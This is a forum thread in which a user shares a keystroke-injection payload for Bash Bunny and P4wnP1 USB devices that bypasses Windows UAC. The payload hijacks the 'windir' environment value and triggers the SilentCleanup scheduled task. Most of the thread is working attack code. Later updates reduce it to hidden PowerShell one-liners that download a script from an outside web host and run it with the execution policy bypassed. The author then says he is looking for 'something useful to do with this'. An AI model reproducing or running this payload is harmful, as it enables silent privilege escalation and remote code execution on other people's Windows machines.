Jump to content

lokiuox uac bypass payload


KryptoKat

Recommended Posts

Posted

In theory, this bash bunny script should make a directory in C:\Windows called uac-bypassed I have no way to test this specific script because I don't have a bash bunny or a rubber ducky, so I had to make do with a P4wnP1 A.L.O.A. any help making this payload smaller would be greatly appreciated.
(The command at the bottom is for the P4wnP1 A.L.O.A)

 

Q GUI R
Q powershell
Q ENTER
Q DELAY 500
Q "echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\"; `$Name = `\"windir`\"; `$Value = `\"powershell -ep bypass -w h `$PSCommandPath;#`\"; Set-ItemProperty -Path `$registryPath -Name `$name -Value `$Value; schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null; Remove-ItemProperty -Path `$registryPath -Name `$name; }\" > uac.ps1"
Q ENTER
Q Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
Q ENTER
Q DELAY 500
Q a
Q .\\uac.ps1
Q ENTER
Q rmdir uac.ps1
Q ENTER
Q Set-ExecutionPolicy Undefined -Scope CurrentUser
Q ENTER
Q DELAY 500
Q a
Q ENTER
Q exit
Q ENTER
P4wnP1_cli hid run -c 'layout("us"); typingSpeed(15,0); press("GUI R"); type("powershell"); press("ENTER"); delay(500); type(" echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\"; `$Name = `\"windir`\"; `$Value = `\"powershell -ep bypass -w h `$PSCommandPath;#`\"; Set-ItemProperty -Path `$registryPath -Name `$name -Value `$Value; schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null; Remove-ItemProperty -Path `$registryPath -Name `$name; }\" > uac.ps1"); press("ENTER"); type("Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"); press("ENTER"); delay(500); type("a"); press("ENTER"); type(".\\uac.ps1"); press("ENTER"); type("rmdir uac.ps1"); press("ENTER"); type("Set-ExecutionPolicy Undefined -Scope CurrentUser"); press("ENTER"); delay(500); type("a"); press("ENTER"); type("exit"); press("ENTER");'
Posted

---UPDATE---

I've Simplified the script to

powershell -w h curl -OutFile '%USERPROFILE%\uac.ps1' 'petrolic-designator.000webhostapp.com/uac.txt';

However I'm having trouble running the file in the same line, any help would be greatly appreciated

Posted

---UPDATE---

I finally got the PowerShell script functioning, in theory, this should work on any account because everyone has access to C:\Windows\Temp

powershell -w h -ep bypass curl -OutFile 'C:\Windows\Temp\uac.ps1' 'petrolic-designator.000webhostapp.com/uac.txt'; C:\Windows\Temp\uac.ps1

Now to find something useful to do with this

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...